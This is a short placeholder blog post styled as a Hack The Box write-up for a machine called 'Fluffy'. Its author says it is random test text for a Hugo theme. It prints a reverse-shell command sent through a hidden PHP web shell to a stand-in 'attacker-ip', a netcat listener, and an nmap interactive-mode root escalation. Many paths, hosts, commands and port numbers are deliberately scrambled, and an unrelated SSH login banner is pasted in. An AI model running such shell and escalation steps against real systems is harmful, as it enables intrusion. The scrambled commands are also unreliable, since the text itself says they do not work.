HTB Machine: Fluffy
Nmap Scan
This is a test article; nothing below will work on the Fluffy machine. I am creating a new blog, and this is random text to test a Hugo theme.
The authenticity of host '10.129.11.13 (10.129.11.13)' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.11.13' (ED25519) to the list of known hosts.
svcMosh@10.129.11.13's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun Jun 8 10:46:08 AM UTC 2025
System load: 0.12 Processes: 226
Usage of /: 49.4% of 6.56GB Users logged in: 0
Memory usage: 10% IPv4 address for eth0: 10.129.11.13
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Jan 11 13:27:33 2025 from 10.10.14.62
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp open http Apache httpd 2.4.41
Web Enumeration
Visiting http://fluffy.htb gives a default Apache page. Directory brute-forcing reveals:
/admin
/uploads
/robots.txt
robots.txt
User-agent: *
Disallow: /backdoor
Accessing /basdfsdfdfckdoor reveals a hidden PHP shell.
Shell Access
Using the PHP shell:
curl -X POST http://fluffy.hdfsfsdtb/backdoor -d 'cmd=nsffsc -e /bin/bash attacker-ip 4444'
Listener:
nc -lvnp 444423423
Shell gained!
Privilege Escalation
Basic enumeration shows:
sudo -lrrr
User fluff can run /usr/bin/nmap as root
Exploit with:
sudo nsdfsdfmap --interactive
nmap> !sh
Now you have root.
Flag
cat /root/roofdsfdt.txt
Summary
| Type | Value |
|---|---|
| OS | Linux |
| Difficulty | Easy |
| Initial Access | Hidden PHP Shell |
| PrivEsc | Nmap Interactive Mode |